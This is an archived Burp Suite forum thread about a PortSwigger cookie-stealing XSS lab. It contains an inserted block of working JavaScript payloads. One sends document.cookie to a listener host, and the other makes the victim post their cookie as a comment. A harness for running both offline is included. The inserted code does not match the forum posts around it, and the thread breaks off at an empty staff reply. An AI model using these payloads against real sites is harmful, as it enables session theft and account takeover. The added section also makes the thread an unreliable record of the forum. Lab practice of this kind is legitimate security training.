The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Exploiting cross-site scripting to steal cookies

Olivier | Last updated: Oct 15, 2019 03:38PM UTC

I inject JavaScript code to steal cookies, but the online lab doesn't simulate another user who views blog comments after they are posted... Any idea why? Known bug? I don't use Burp Collaborator but a service hosted on Heroku. Thanks for any help.

Ben, PortSwigger Agent | Last updated: Oct 16, 2019 07:49AM UTC

Hi Olivier, Thank you for your message. The labs are designed to be solved using the tools within Burp Suite. I have just tested the lab and was able to successfully complete it using Burp Collaborator. I would suggest using Burp Collaborator and seeing if you have any further issues completing the lab.

Ben, PortSwigger Agent | Last updated: Oct 16, 2019 11:52AM UTC

Hi Olivier, Unfortunately, Burp Collaborator is only available in the Professional edition. Having looked at the lab again, it does state: "Instead of using Burp Collaborator, you could adapt the attack to make the victim post their cookie within a blog comment by exploiting the XSS to perform CSRF, although this would mean that the cookie value is exposed publicly, and also discloses evidence that the attack was performed." So perhaps you could investigate and use this method instead of Burp Collaborator if you are looking to solve the lab. Please let us know if you need any further assistance.

Burp User | Last updated: Oct 16, 2019 03:11PM UTC

Hi Ben, Thanks for your answer. Is Burp Collaborator included in the Burp Community version? Regards, Olivier

Gadotti | Last updated: Feb 18, 2020 10:59PM UTC

The problem is that the note says: "Instead of using Burp Collaborator, you could adapt the attack to make the victim post their cookie within a blog comment by exploiting the XSS to perform CSRF, although this would mean that the cookie value is exposed publicly, and also discloses evidence that the attack was performed." I did exactly what was said: I exposed the document cookie from 'another' user in the comments by injecting JS, but I didn't get a solved tag. Isn't it supposed to be a Collaborator alternative?
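The two attack shapes discussed in Ben's and Gadotti's posts above, written out as an added example (this is not code from the thread or from the PortSwigger lab): an out-of-band payload that sends document.cookie to a listener you control (Burp Collaborator, or a self-hosted service as in the original question), and the no-server alternative from the lab note, where the injected script runs in the victim's origin and POSTs a fresh comment containing the victim's cookie back to the same blog (XSS used to perform CSRF). Because the forum thread cannot show the missing "victim views the comments" step, the block also includes a small stand-in for the victim's browser so both payloads can be exercised offline. The comment endpoint path, the form field names, the cookie value and the stubbed browser are all assumptions.

```javascript
// Added example, not from the forum thread or the PortSwigger lab.
// Assumptions: comment endpoint path, form field names, cookie value.

// Variant 1: out-of-band exfiltration to a host you control. The cookie is
// URL-encoded so '=' and ';' survive as query-string data. Only cookies without
// the HttpOnly flag are visible to document.cookie, so this (and variant 2)
// requires the session cookie to be script-readable.
function exfilPayload(listenerHost) {
  return '<script>' +
    'fetch("https://' + listenerHost + '/?c=" + encodeURIComponent(document.cookie), ' +
    '{mode: "no-cors"});' +
    '</script>';
}

// Variant 2: no external server. The script executes same-origin in the
// victim's browser, so it can submit a new comment that carries the victim's
// cookie; the value then appears in the public comment list (and so does
// evidence of the attack, as the lab note warns). postId and the field names
// are assumed, not taken from the lab.
function csrfCommentPayload(postId, commentPath) {
  return '<script>' +
    'fetch("' + commentPath + '", {method: "POST", ' +
    'headers: {"Content-Type": "application/x-www-form-urlencoded"}, ' +
    'body: "postId=' + postId + '&name=x&email=x%40x.x&website=&comment=" + ' +
    'encodeURIComponent(document.cookie)});' +
    '</script>';
}

// Stand-in for the victim rendering the comment page (the step the question
// says the lab did not appear to perform). Extracts the script body from the
// stored comment and runs it against a stubbed document and fetch, recording
// every request the payload makes.
function runInVictimBrowser(payload, victimCookie) {
  const m = /<script>([\s\S]*?)<\/script>/.exec(payload);
  if (!m) throw new Error('no script block in payload');
  const requests = [];
  const fetchStub = (url, init) => {
    requests.push({ url: url, init: init || {} });
    return Promise.resolve({ ok: true });
  };
  const documentStub = { cookie: victimCookie };
  // Parameters shadow the globals, so the payload sees the stubs.
  new Function('document', 'fetch', m[1])(documentStub, fetchStub);
  return requests;
}

// What the listener sees for variant 1: decode the cookie from the query string.
function cookieFromExfilUrl(url) {
  return new URL(url).searchParams.get('c');
}

// What ends up in the public comment for variant 2: parse the form body.
function cookieFromCommentBody(body) {
  return new URLSearchParams(body).get('comment');
}

// Demo with a constructed victim cookie.
const victimCookie = 'session=abc123';
const oob = runInVictimBrowser(exfilPayload('example-listener.invalid'), victimCookie);
console.log('variant 1 listener receives:', cookieFromExfilUrl(oob[0].url));
const csrf = runInVictimBrowser(csrfCommentPayload(7, '/post/comment'), victimCookie);
console.log('variant 2 posts comment containing:', cookieFromCommentBody(csrf[0].init.body));
```

In the real lab the only difference between the two variants is where the request goes: variant 1 needs the listener to be reachable from the victim's browser, which is why a self-hosted endpoint has to be public and TLS-capable, while variant 2 stays inside the target origin and needs no external infrastructure at all. Either way, nothing happens until the simulated victim actually renders the comment page, so when testing outside the lab the stub above is what stands in for that visit.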

Uthman, PortSwigger Agent | Last updated: Feb 19, 2020 09:14AM UTC